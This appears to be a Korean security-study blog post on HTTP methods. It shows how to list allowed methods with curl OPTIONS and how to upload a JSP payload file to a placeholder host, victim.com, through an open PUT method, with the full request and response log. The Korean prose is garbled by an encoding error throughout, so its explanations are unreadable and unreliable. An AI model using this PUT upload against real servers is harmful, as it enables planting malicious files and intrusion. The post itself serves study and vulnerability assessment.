ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค.
์์ฆ ์ ๋ฌด๋ฅผ ํ๋ฉด์ ์ทจ์ฝ์ ์ ๊ฒ์ ๋ง์ดํ๊ณ ์๋ค. ์ด๊ฒ์ ๊ฒ ํ๋ค๋ณด๋ ๊ทธ๋ฅ ๊ฐ๋ ์ ๋ฆฌ๋ก ์์ฑํ๋ค.
๋ฉ์๋์๋ ๊ธฐ๋ณธ์ ์ผ๋ก GET, POST, OPTIONS, HEAD, DELETE, PUT ๊ฐ ์๋ค. ๋ญ ๊ฐ๋ TRACE ๋ ์ฌ์ฉํ ๋๊ฐ ์๋ค.
์ฃผ์์ ๋ณดํต์ ๊ธฐ๋ฐ์์ค ๊ฐ์ด๋๋ผ์ธ๊ณผ ๊ฐ์ ํญ๋ชฉ์ ๋ถํ์ํ ๋ฉ์๋๋ฅผ ์์ ๋ผ๊ณ ๊ถ๊ณ ๋ฅผ ํ๊ณ ์๋ค. ๊ธฐ๋ณธ์ ์ผ๋ก GET, POST๋ง ์ด์ด๋๋ ๊ณณ์ด ๋ง์๋ฐ ๊ฐ๋ ๋ฉ์๋๊ฐ ๋ชจ๋ ์ด๋ ค์๋ ๊ฒฝ์ฐ๊ฐ ์๋ค.
๊ฐ๋จํ๊ฒ ์ค๋ช ์ ํด๋ณด์๋ฉด GET, POST๋ ์๋ตํ๊ณ OPTIONS์ allow๋์ด์๋ ๋ฉ์๋๋ฅผ ํ์ธํ ์์๊ฒํด์ฃผ๋ ๋ฉ์๋์ด๋ค.
curl -v -L -X OPTIONS blog.z3alous.xyz
์ด๋ ๊ฒ ํ๋ฒ ํด๋ณด๋ฉด
์ด๋ ๊ฒ Allow๋ก ์ด๋ ค์๋ ๋ฉ์๋๋ฅผ ํ์ธํ ์ ์๋ค.
HEAD๋ ํค๋ ์ ๋ณด๋ฅผ ํ์ธํ๋ ๊ฒ์ด๊ณ DELETE๋ ์ญ์ , PUT์ ๋ฐ์ด๋ฃ๋ ๊ฒ์ด๋ผ๊ณ ์๊ฐํ๋ฉด ๋๋ค.
๋ง์ฝ์ PUT์ด ์ด๋ ค์๋ค๋ฉด ํ์ผ ์ ๋ก๋๊ฐ ๊ฐ๋ฅํ๋ฐ ์ด๋ฐ์์ ๊ตฌ๋ฌธ์ ํตํ์ฌ ์ ๋ก๋๊ฐ ๊ฐ๋ฅํ๋ค.
curl -v -L -k https://victim.com/ --upload-file /home/z3alous/Desktop/payload.jsp
์ด๋ฐ์์ ๊ตฌ๋ฌธ์ผ๋ก ์ ๋ก๋๊ฐ ๊ฐ๋ฅํ๋ค.
์ ๋ ๊ฒ ํ๋ฉด ๊ฒฐ๊ณผ๋ ์ด๋ฐ์์ผ๋ก ๋จ๊ฒ ๋๋๋ฐ...
> PUT /test.jsp HTTP/1.1
> Host: victim.com
> User-Agent: curl/7.88.1
> Accept: */*
> Content-Length: 34
> Expect: 100-continue
>
< HTTP/1.1 100 Continue
* We are completely uploaded and fine
< HTTP/1.1 404 Not Found
< Server: Apache
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 09:00:00 KST
< Set-Cookie: JSESSIONID=; Path=/; Secure; HttpOnly
< Content-Type: text/html;charset=UTF-8
< Content-Length: 1098
< Date: Tue, 08 Aug 2023 06:43:29 GMT
< Connection: close
์๋ต์ฝ๋ 100 Continue๊ฐ ๋ฐ์ํ๋ฉด์ We are completely uploaded and fine์ด๋ผ๋ ๊ตฌ๋ฌธ์ ๋ณด์ฌ์ค๋ค.
๊ทผ๋ฐ 404๊ฐ ์ฐ๋ฌ์ ๋จ๋ฉด์ ํ์ผ์ not found๊ฐ ๋๋ค.... ์ด ๋ถ๋ถ์ ์ดํด๊ฐ ์์๊ฐ๋๋ฐ 404์๋ฌ๋ฅผ ์ก์ผ๋ฉด 403 ๊ถํ๋ฌธ์ ๊ฐ ๋ฐ์ํ๋๋ฐ ์๋๋ put์ ์ด์ฉํ์ฌ ํ์ผ์ ์ ๋ก๋ ํ๊ฒ๋๋ฉด 201 ์๋ต์ฝ๋๊ฐ ๋ฐ์ํ๋ฉด์ ์ ์์ ์ผ๋ก ์ ๋ก๋๊ฐ๋๋ค.
403๊ณผ 404์๋ฌ๊ฐ ๋ฐ์ํ๋ ์์ธ์ ํ ์คํธ๋ฅผ ์ขํด๋ด์ผํ ๊ฒ๊ฐ๋ค. ํน์ฌ๋ ์๋ ์ฌ๋์์ผ๋ฉด ๋๊ธ๋ก ์๋ ค์ฃผ๋ฉด ๊ฐ์ฌํฉ๋๋ค.!!!
ํ ํผ put๋ฉ์๋๋ฅผ ์ด์ฉํ์ฌ ํ์ผ์ ๋ก๋๊ฐ ๊ฐ๋ฅํ๋ฉฐ ์ ์ฉ์ด ๊ฐ๋ฅํ๋ค.
์๋ฒ๋ฅผ ๋ด๋นํ๊ฑฐ๋ ๊ด๋ฆฌ๋ฅผ ํ๋ ์ ์ฅ์์ ๋ฉ์๋๊ฐ ๋ณ๊ฒ์ด ์๋๊ฒ๊ฐ์ง๋ง ํฌ๋ฆฌํฐ์ปฌํ ์ทจ์ฝ์ ์ผ๋ก ๋ค๊ฐ์ฌ์ ์์์ ์๊ณ ์์ด์ผํ ๊ฒ๊ฐ๋ค.
'Security Study > Web' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
์ทจ์ฝ์ ์ ๊ฒํ๋ค๊ฐ ์ ๊ธฐ๋ฐฉ๊ธฐํ ๊ฒ์ ๋ณด์๋ค.!!!! (0) | 2023.10.09 |
---|---|
[์น์ทจ์ฝ์ ] XSS ํ๋ค๋ณด๋... (0) | 2023.07.20 |
Web ์ทจ์ฝ์ ๊ด๋ จ ๋ด์ฉ ์ ๋ฆฌ (0) | 2023.03.10 |
์ด์ฉ๋ค๋ณด๋ Stored XSS์ ๋ํ์ฌ... (0) | 2023.02.14 |
owasp zap tutorial :) (0) | 2016.12.27 |
๋๊ธ